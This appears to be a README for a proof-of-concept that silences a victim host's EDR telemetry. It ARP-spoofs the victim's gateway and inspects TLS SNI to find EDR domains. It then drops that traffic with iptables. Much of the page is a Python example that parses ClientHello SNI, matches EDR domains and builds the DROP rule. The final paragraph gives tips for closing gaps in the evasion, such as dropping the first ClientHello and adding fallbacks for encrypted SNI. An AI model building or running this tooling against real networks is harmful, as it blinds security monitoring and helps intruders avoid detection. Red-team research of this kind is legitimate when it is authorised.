A PoC for network-based EDR telemetry filtering using ARP spoofing.
1. ARP Spoofing: Perform ARP spoofing against the victim host so that the attacker machine is used as the victim's gateway and relays its traffic.
2. Traffic Sniffing: Sniff the relayed traffic, intercept TLS ClientHello messages and inspect the Server Name Indication (SNI) extension for EDR-related domains.
3. Traffic Blocking: Use iptables to drop traffic destined for the EDR servers identified by the SNI inspection.
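The inspection step (2) and the blocking decision (3) are the part a reader is most likely to want to see spelled out. The following is an added example, not code from this repository: a small pure-Python ClientHello parser that pulls the host_name out of the SNI extension, matches it against a list of EDR domains, and produces the iptables command that step 3 would run. It runs offline on a constructed ClientHello record; the domain suffixes (`edr.example.com`, `telemetry.example.net`), the destination IP and the use of the FORWARD chain are assumptions for illustration, since the real vendor hostnames are not given on this page.

```python
import struct

# Hypothetical EDR hostname suffixes; the real list depends on the vendor in use.
EDR_DOMAIN_SUFFIXES = ("edr.example.com", "telemetry.example.net")


def build_client_hello(server_name: str) -> bytes:
    """Constructed test input: a minimal TLS 1.2 ClientHello record carrying only an SNI extension."""
    host = server_name.encode("ascii")
    sni_list = b"\x00" + struct.pack("!H", len(host)) + host          # name_type host_name(0)
    sni_ext = struct.pack("!HH", 0x0000, len(sni_list) + 2) \
        + struct.pack("!H", len(sni_list)) + sni_list                  # ext type 0, ext length, list
    body = (
        b"\x03\x03"                        # client_version TLS 1.2
        + b"\x00" * 32                     # random
        + b"\x00"                          # session_id length 0
        + b"\x00\x02\x13\x01"              # one cipher suite
        + b"\x01\x00"                      # compression: null
        + struct.pack("!H", len(sni_ext)) + sni_ext
    )
    handshake = b"\x01" + struct.pack("!I", len(body))[1:] + body      # client_hello(1), 3-byte length
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(record: bytes):
    """Return the SNI host_name from a TLS record holding a ClientHello, or None.

    Returns None for non-handshake records, non-ClientHello handshakes, ClientHellos
    without extensions, and ClientHellos truncated by record fragmentation.
    """
    if len(record) < 5 or record[0] != 0x16:                           # not a handshake record
        return None
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:                                   # not a ClientHello
        return None
    hs_len = int.from_bytes(hs[1:4], "big")
    body = hs[4:4 + hs_len]
    if len(body) < hs_len:                                             # split across records; needs reassembly
        return None
    pos = 2 + 32                                                       # skip version + random
    if pos >= len(body):
        return None
    pos += 1 + body[pos]                                               # session_id
    if pos + 2 > len(body):
        return None
    pos += 2 + struct.unpack("!H", body[pos:pos + 2])[0]               # cipher_suites
    if pos + 1 > len(body):
        return None
    pos += 1 + body[pos]                                               # compression_methods
    if pos + 2 > len(body):                                            # no extensions block at all
        return None
    end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2
    if end > len(body):
        return None
    while pos + 4 <= end:
        etype, elen = struct.unpack("!HH", body[pos:pos + 4])
        pos += 4
        edata = body[pos:pos + elen]
        pos += elen
        if etype != 0x0000 or len(edata) < 2:
            continue
        list_len = struct.unpack("!H", edata[:2])[0]
        q = 2
        while q + 3 <= 2 + list_len and q + 3 <= len(edata):
            ntype, nlen = edata[q], struct.unpack("!H", edata[q + 1:q + 3])[0]
            q += 3
            name = edata[q:q + nlen]
            q += nlen
            if ntype == 0:
                try:
                    return name.decode("ascii")
                except UnicodeDecodeError:
                    return None
    return None


def is_edr_domain(name: str, suffixes=EDR_DOMAIN_SUFFIXES) -> bool:
    """Exact or subdomain match against the EDR suffix list (case-insensitive, trailing dot ignored)."""
    name = name.lower().rstrip(".")
    return any(name == s or name.endswith("." + s) for s in suffixes)


def iptables_rule(dst_ip: str):
    """iptables command to drop the victim's HTTPS traffic to one EDR server IP.

    FORWARD chain, because the attacker box is relaying the victim's packets as the spoofed gateway
    (ip_forward must be enabled for the relay to work at all).
    """
    return ["iptables", "-I", "FORWARD", "-d", dst_ip, "-p", "tcp", "--dport", "443", "-j", "DROP"]


def decide(record: bytes, dst_ip: str):
    """Inspect one sniffed TLS record; return the blocking command if its SNI is an EDR domain, else None."""
    sni = extract_sni(record)
    if sni and is_edr_domain(sni):
        return iptables_rule(dst_ip)
    return None
```

Two caveats a practitioner will hit with this approach: the rule is only inserted after the first ClientHello has been seen, so that first connection reaches the EDR server unless the sniffer also drops the ClientHello packet itself; and any connection whose SNI is absent, encrypted (ECH) or fragmented across records is not classified by this parser, so a destination-IP or DNS-based fallback is usually needed alongside it.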
The advantage of this approach over host-firewall-based filtering is that it needs no admin privileges on, or any access to, the victim host. The trade-off is that the attacker has to sit on the same local network (the victim's L2 segment) to perform ARP spoofing :)
14 Jul 2024